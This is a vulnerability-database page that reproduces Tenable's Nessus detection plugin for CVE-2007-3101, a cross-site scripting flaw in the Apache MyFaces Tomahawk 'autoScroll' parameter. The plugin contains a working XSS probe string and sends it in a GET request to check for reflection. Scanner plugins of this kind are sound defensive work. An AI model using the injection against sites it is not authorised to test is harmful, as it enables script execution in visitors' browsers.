Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2007-2022 Tenable Network Security, Inc.MYFACES_TOMAHAWK_AUTOSCROLL_XSS.NASL
HistoryJun 19, 2007 - 12:00 a.m.

Apache MyFaces Tomahawk JSF Application autoscroll Multiple XSS

2007-06-1900:00:00
This script is Copyright (C) 2007-2022 Tenable Network Security, Inc.
www.tenable.com
123
JSON

The remote web server uses an implementation of the Apache MyFaces Tomahawk JSF framework that fails to sanitize user-supplied input to the ‘autoScroll’ parameter before using it to generate dynamic content. An unauthenticated, remote attacker may be able to leverage this issue to inject arbitrary HTML or script code into a user’s browser to be executed within the security context of the affected site.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(25546);
  script_version("1.22");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2007-3101");
  script_bugtraq_id(24480);

  script_name(english:"Apache MyFaces Tomahawk JSF Application autoscroll Multiple XSS");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server uses a JSP framework that is vulnerable to a
cross-site scripting attack.");
  script_set_attribute(attribute:"description", value:
"The remote web server uses an implementation of the Apache MyFaces
Tomahawk JSF framework that fails to sanitize user-supplied input to
the 'autoScroll' parameter before using it to generate dynamic
content.  An unauthenticated, remote attacker may be able to leverage
this issue to inject arbitrary HTML or script code into a user's
browser to be executed within the security context of the affected
site.");
  # https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=544
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?7f1297cd");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/471397/30/0/threaded");
  script_set_attribute(attribute:"see_also", value:"https://issues.apache.org/jira/browse/TOMAHAWK-983");
  # https://issues.apache.org/jira/secure/ReleaseNote.jspa?version=12312536&styleName=Text&projectId=12310272
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?cf864114");
  script_set_attribute(attribute:"solution", value:
"Upgrade to MyFaces Tomahawk version 1.1.6 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/05/10");
  script_set_attribute(attribute:"patch_publication_date", value:"2007/06/13");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/06/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:myfaces_tomahawk");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007-2022 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl", "webmirror.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");


port = get_http_port(default: 80);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0, "The web server on port "+port+" is vulnerable to cross-site scripting");

exploit = string("0,275);//--></script><script>alert('", SCRIPT_NAME, "'");

# Iterate over a couple of files and see if we can exploit the issue.
files = get_kb_list(string("www/", port, "/content/extensions/jsf"));
if (isnull(files)) files = make_list("/home.jsf", "/index.jsf");

max_files = 10;
n = 0;
foreach file (files)
{
  # Try to exploit the issue.
  w = http_send_recv3(method:"GET", 
    item:string(
      file, "?",
      "autoScroll=", urlencode(str:exploit)
    ), 
    port:port
  );
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # If it looks like MyFaces...
  if ("<!-- MYFACES JAVASCRIPT -->" >< res)
  {
    # There's a problem if we see our exploit.
    if (string("window.scrollTo(", exploit, ");") >< res)
    {
      security_warning(port);
      set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
      exit(0);
    }
  }

  # Unless we're paranoid, stop after the first check as the issue
  # affects the framework itself and it's unlikely we'll find 
  # multiple frameworks installed on the same server.
  if (report_paranoia < 2) exit(0);

  if (n++ > max_files) exit(0);
}
VendorProductVersionCPE
apachemyfaces_tomahawkcpe:/a:apache:myfaces_tomahawk

Related

veracode 1
cve 1
securityvulns 2
prion 1
veracode
veracode
Cross-site Scripting (XSS)
2018-11-13 04:46:45
cve
cve
CVE-2007-3101
2007-06-18 10:30:00
securityvulns
securityvulns
Apache MyFaces Tomahawk crossite scripting
2007-06-15 00:00:00
iDefense Security Advisory 06.14.07: Apache MyFaces Tomahawk JSF Framework Cross-Site Scripting &#40;XSS&#41; Vulnerability
2007-06-15 00:00:00
prion
prion
Cross site scripting
2007-06-18 10:30:00
JSON
Related for MYFACES_TOMAHAWK_AUTOSCROLL_XSS.NASL
veracode1cve1securityvulns2prion1